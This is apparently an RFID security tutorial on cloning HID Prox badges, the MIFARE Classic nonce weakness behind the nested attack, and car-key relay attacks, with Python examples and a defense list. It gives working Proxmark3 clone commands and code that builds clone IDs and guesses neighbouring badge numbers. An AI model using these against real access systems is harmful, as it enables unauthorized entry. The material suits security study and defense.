Radio Frequency Identification (RFID) is everywhere: passports, credit cards, office badges, and pet chips. But the implementations are often shockingly insecure.
The Frequency Bands
- LF (Low Frequency) - 125 kHz: Old office badges (HID Prox).
  Security: Zero. The tag has no cryptography; it just broadcasts a fixed serial number to any reader in range.
  Attack: Capture and replay, or clone it to a blank T5577 card.
- HF (High Frequency) - 13.56 MHz: Hotel keys, credit cards, NFC.
  Security: Cryptography supported (MIFARE family), but only as strong as the product chosen.
  Attack: Cracking weak crypto (MIFARE Classic's Crypto-1).
1. The Proxmark3
The Swiss Army knife of RFID hacking.
pm3> lf search -> Identifies the tag; for an HID Prox badge it prints the raw ID plus the decoded facility code and card number.
pm3> lf hid clone -r 2004263121 -> With a blank T5577 on the antenna, writes that raw ID to it.
Walk into the building like you own it.
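What the Proxmark3 is actually copying is worth seeing in code. The following is an added example, not code from the original page or from the Proxmark3 project: it decodes and re-encodes HID Prox H10301 (26-bit Wiegand) IDs in the raw layout the Proxmark3 client uses for sub-37-bit formats (a fixed marker at bit 37, a length-marker bit directly above the data, then even parity, 8-bit facility code, 16-bit card number, odd parity). The sample raw value 2006ec0c86 is a constructed test vector, and the neighbouring-ID generator goes one step beyond the page's clone-one-badge scenario to show why sequentially issued badges are guessable.

```python
# Added example (not from the original page or the Proxmark3 project):
# decode and re-encode HID Prox H10301 (26-bit Wiegand) IDs in the raw form
# the Proxmark3 prints for `lf hid reader` and accepts for `lf hid clone -r`.
# Raw layout (bit 0 = LSB) for standard, sub-37-bit HID formats:
#   bit 37     : fixed marker
#   bit 26     : length marker directly above the 26 data bits
#   bits 25..0 : P_even | FC (8 bits) | CN (16 bits) | P_odd
# The value 2006ec0c86 used below is a constructed test vector, not a real badge.

STANDARD_FORMAT_MARKER = 1 << 37


def _parity(value: int) -> int:
    """1 if `value` has an odd number of set bits, else 0."""
    return bin(value).count("1") & 1


def wiegand26_encode(fc: int, cn: int) -> int:
    """Build the 26-bit H10301 word from facility code and card number."""
    if not 0 <= fc <= 0xFF or not 0 <= cn <= 0xFFFF:
        raise ValueError("H10301 allows FC 0..255 and CN 0..65535")
    body = (fc << 16) | cn                 # 24 payload bits
    p_even = _parity(body >> 12)           # even parity over the left 12 payload bits
    p_odd = 1 - _parity(body & 0xFFF)      # odd parity over the right 12 payload bits
    return (p_even << 25) | (body << 1) | p_odd


def wiegand26_decode(word: int) -> dict:
    """Split a 26-bit word into FC and CN and verify both parity bits."""
    if word >> 26:
        raise ValueError("not a 26-bit word")
    body = (word >> 1) & 0xFFFFFF
    parity_ok = (_parity(word >> 13) == 0          # top 13 bits must be even
                 and _parity(word & 0x1FFF) == 1)  # bottom 13 bits must be odd
    return {"fc": body >> 16, "cn": body & 0xFFFF, "parity_ok": parity_ok}


def hid_raw_decode(raw_hex: str) -> dict:
    """Decode a Proxmark3-style raw HID Prox ID such as '2006ec0c86'."""
    raw = int(raw_hex, 16)
    if not raw & STANDARD_FORMAT_MARKER:
        raise ValueError("long (>= 37-bit) HID formats are not handled here")
    rest = raw & (STANDARD_FORMAT_MARKER - 1)
    fmt_len = rest.bit_length() - 1        # position of the length-marker bit
    word = rest & ((1 << fmt_len) - 1)
    if fmt_len != 26:
        return {"format_len": fmt_len, "word": word}
    return {"format_len": 26, **wiegand26_decode(word)}


def hid_raw_encode(fc: int, cn: int) -> str:
    """Produce the raw hex to hand to `lf hid clone -r` for a 26-bit card."""
    raw = STANDARD_FORMAT_MARKER | (1 << 26) | wiegand26_encode(fc, cn)
    return format(raw, "x")


def neighbouring_ids(raw_hex: str, count: int) -> list:
    """Raw IDs for the next `count` card numbers under the same facility code.
    Badges are usually issued sequentially, so one captured badge yields good
    guesses for colleagues' badges; only two parity bits stand in the way."""
    card = hid_raw_decode(raw_hex)
    return [hid_raw_encode(card["fc"], card["cn"] + i) for i in range(1, count + 1)]


if __name__ == "__main__":
    print(hid_raw_decode("2006ec0c86"))     # FC 118, CN 1603, parity OK
    print(hid_raw_encode(118, 1603))        # 2006ec0c86
    print(neighbouring_ids("2006ec0c86", 3))
```

The whole "credential" is 24 bits of payload plus two parity bits, and the encoder is the complete recipe for a clone; there is no secret anywhere in the exchange for a reader to verify.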
2. Mifare Classic (Broken)
Millions of hotel doors and many transit systems still use MIFARE Classic.
It protects each sector with a 48-bit key and the proprietary Crypto-1 stream cipher.
The cipher was reverse-engineered in 2008, and the tag's nonce generator turned out to be a 16-bit LFSR, so a "random" nonce is predictable once you have seen one.
Nested Attack: If you know ONE sector key (often a factory default such as FFFFFFFFFFFF), authenticate with it, then ask the tag to authenticate to another sector. The tag encrypts its next nonce with the unknown key, but that nonce is predictable, so the ciphertext leaks keystream and the key falls out in seconds to a minute. Repeat per sector to recover ALL keys. If no key is known, the darkside attack still recovers the first one on original cards; hardened cards with a proper RNG need the slower hardnested attack once one key is known.
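The weak nonce generator is the whole reason the nested attack works, so here it is as an added example (not code from the original page, NXP, or the Proxmark3 project, whose `hf mf nested` and `hf mf autopwn` automate the real attack). It models the published 16-bit LFSR with feedback polynomial x^16 + x^14 + x^13 + x^11 + 1, handles nonces in the byte order the tag sends them (bits inside a byte LSB first, as on the ISO 14443-A air interface), and shows that only 2^16 of the 2^32 possible nonce values can occur and that the next nonce is just the PRNG clocked forward. The sample nonce 0x01200145 and the clock-distance window are constructed for the example.

```python
# Added example (not from the original page or any vendor): a model of the
# 16-bit LFSR that MIFARE Classic tags use to produce their 32-bit nonces.
# Feedback polynomial x^16 + x^14 + x^13 + x^11 + 1, i.e. x[i] = x[i-16] ^ x[i-14] ^ x[i-13] ^ x[i-11].
# Nonces are ints in the byte order sent on the wire (big-endian); within a byte
# the bit sent first is the LSB. 0x01200145 is a constructed sample nonce.


def _swap32(value: int) -> int:
    """Reverse byte order so that bit i of the result is stream bit x_i."""
    return int.from_bytes(value.to_bytes(4, "big"), "little")


def prng_successor(nonce: int, steps: int) -> int:
    """Clock the tag PRNG `steps` times starting from a nonce it just produced."""
    x = _swap32(nonce)
    for _ in range(steps):
        # the LFSR state is the newest 16 stream bits; feedback is x16 ^ x18 ^ x19 ^ x21
        new_bit = ((x >> 16) ^ (x >> 18) ^ (x >> 19) ^ (x >> 21)) & 1
        x = (x >> 1) | (new_bit << 31)
    return _swap32(x)


def nonce_from_state(state16: int) -> int:
    """Expand a 16-bit LFSR state into the full 32-bit nonce it produces."""
    x = state16 & 0xFFFF
    for i in range(16, 32):
        bit = ((x >> (i - 16)) ^ (x >> (i - 14)) ^ (x >> (i - 13)) ^ (x >> (i - 11))) & 1
        x |= bit << i
    return _swap32(x)


def is_valid_nonce(nonce: int) -> bool:
    """A genuine tag nonce is fully determined by its first 16 bits."""
    return nonce_from_state(_swap32(nonce) & 0xFFFF) == nonce


def all_valid_nonces() -> set:
    """Only 2^16 of the 2^32 possible values can ever come out of the tag."""
    return {nonce_from_state(s) for s in range(1 << 16)}


def cycle_length(nonce: int) -> int:
    """Clocks until the PRNG returns to `nonce` (65535 for any non-zero nonce)."""
    if not is_valid_nonce(nonce):
        raise ValueError("not a nonce this PRNG can produce")
    x, steps = prng_successor(nonce, 1), 1
    while x != nonce:
        x, steps = prng_successor(x, 1), steps + 1
    return steps


def candidate_nonces(known_nonce: int, min_distance: int, max_distance: int) -> list:
    """Nested-attack core: after an authentication that yielded `known_nonce`,
    the nonce for the next (encrypted) authentication is the PRNG advanced by
    the number of clocks between the two. The attacker measures that distance
    on sectors whose key is known, leaving a small window of candidates. Each
    candidate, XORed with the ciphertext the tag sends, gives 32 bits of
    Crypto-1 keystream to test key guesses against."""
    return [prng_successor(known_nonce, d) for d in range(min_distance, max_distance + 1)]


if __name__ == "__main__":
    print(hex(prng_successor(0x01200145, 16)))                 # 0x145c976
    print(len(all_valid_nonces()), cycle_length(0x01200145))  # 65536 65535
    print([hex(n) for n in candidate_nonces(0x01200145, 160, 164)])
```

Two properties do the damage: the nonce space is 65536 values rather than four billion, and every nonce after the first is a fixed function of the one before it. A design with a real random number generator would have neither.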
3. Relay Attacks
Stealing a car (Passive Keyless Entry).
Thief A stands near your front door (where the keys are) with one half of a relay.
Thief B stands near your car with the other half.
They relay the signals between car and fob over LTE. The car thinks the key is right next to it and unlocks. Strong crypto does not help here: the genuine fob answers the car's challenge correctly, just from farther away than the protocol assumed. What helps is bounding the round-trip time (UWB distance bounding) or a fob that goes to sleep when it has not moved.
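The point that a relay passes every cryptographic check and fails only a timing check is easiest to see in a simulation. The following is an added example, not code from the original page or any car maker: a passive-keyless-entry challenge/response in which the car also enforces a round-trip-time budget derived from its maximum intended range. HMAC-SHA256 stands in for the fob's proprietary cipher, and the 2 m range, 1 µs fob compute time, 1.5 m owner distance and 30 ms relay latency are constructed values.

```python
# Added example (not from the original page or any car maker): simulated
# passive-keyless-entry challenge/response with a distance-bounding check.
# HMAC-SHA256 stands in for the fob's proprietary cipher; range, compute time
# and relay latency below are constructed values for the example.
import hashlib
import hmac
import secrets

SPEED_OF_LIGHT_M_PER_NS = 0.299792458      # metres travelled per nanosecond


def rtt_budget_ns(max_distance_m: float, fob_processing_ns: float) -> float:
    """Slowest honest round trip: out and back at light speed plus the fob's fixed compute time."""
    return fob_processing_ns + 2 * max_distance_m / SPEED_OF_LIGHT_M_PER_NS


def fob_respond(fob_key: bytes, challenge: bytes) -> bytes:
    """The fob's answer to the car's challenge (HMAC here; proprietary cipher in real fobs)."""
    return hmac.new(fob_key, challenge, hashlib.sha256).digest()[:8]


def car_verify(fob_key: bytes, challenge: bytes, response: bytes,
               observed_rtt_ns: float, budget_ns: float) -> dict:
    """Crypto and timing are independent checks; a relay passes only the first."""
    return {
        "crypto_ok": hmac.compare_digest(fob_respond(fob_key, challenge), response),
        "timing_ok": observed_rtt_ns <= budget_ns,
    }


def simulate_unlock(relay_latency_ns: float, distance_m: float = 1.5,
                    fob_processing_ns: float = 1_000.0, max_range_m: float = 2.0) -> dict:
    """One challenge/response; relay_latency_ns=0 is the owner standing at the car."""
    fob_key = b"constructed-fob-key-0123456789ab"   # shared secret, constructed for the example
    challenge = secrets.token_bytes(8)                 # car's fresh random challenge
    # Thief A's box by the house and Thief B's box by the car forward the frames
    # untouched, so the genuine fob computes the correct response; the only trace
    # of the relay is the extra link latency on top of real propagation time.
    response = fob_respond(fob_key, challenge)
    observed_rtt = (fob_processing_ns
                    + 2 * distance_m / SPEED_OF_LIGHT_M_PER_NS
                    + relay_latency_ns)
    return car_verify(fob_key, challenge, response, observed_rtt,
                      rtt_budget_ns(max_range_m, fob_processing_ns))


if __name__ == "__main__":
    print(simulate_unlock(0))             # {'crypto_ok': True, 'timing_ok': True}
    print(simulate_unlock(30_000_000))    # 30 ms LTE relay: crypto passes, timing fails
```

The budget for a 2 m range is only about 13 ns above the fob's own compute time, which is why the timing check cannot be done with the LF wake-up and UHF reply radios of classic fobs: the current fix is UWB (IEEE 802.15.4z) ranging in the fob, which measures time of flight at that resolution. Any relay, LTE or a purpose-built RF box, adds at least microseconds and so fails the check.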
Defense
1. Use DESFire EV2/EV3: Modern cards with AES-128 mutual authentication. No practical break is public, but deployments still fail when the reader is configured in UID-only mode, since the UID is sent in the clear and is trivially emulated.
2. Shielding: Keep cards in a Faraday sleeve to prevent skimming in your pocket. It does nothing once the card is presented to a reader.
3. Anti-Passback: Reject a card that tries to enter while its original holder is already logged as inside. This needs readers on both entry and exit, and it catches a clone's second use rather than preventing the first.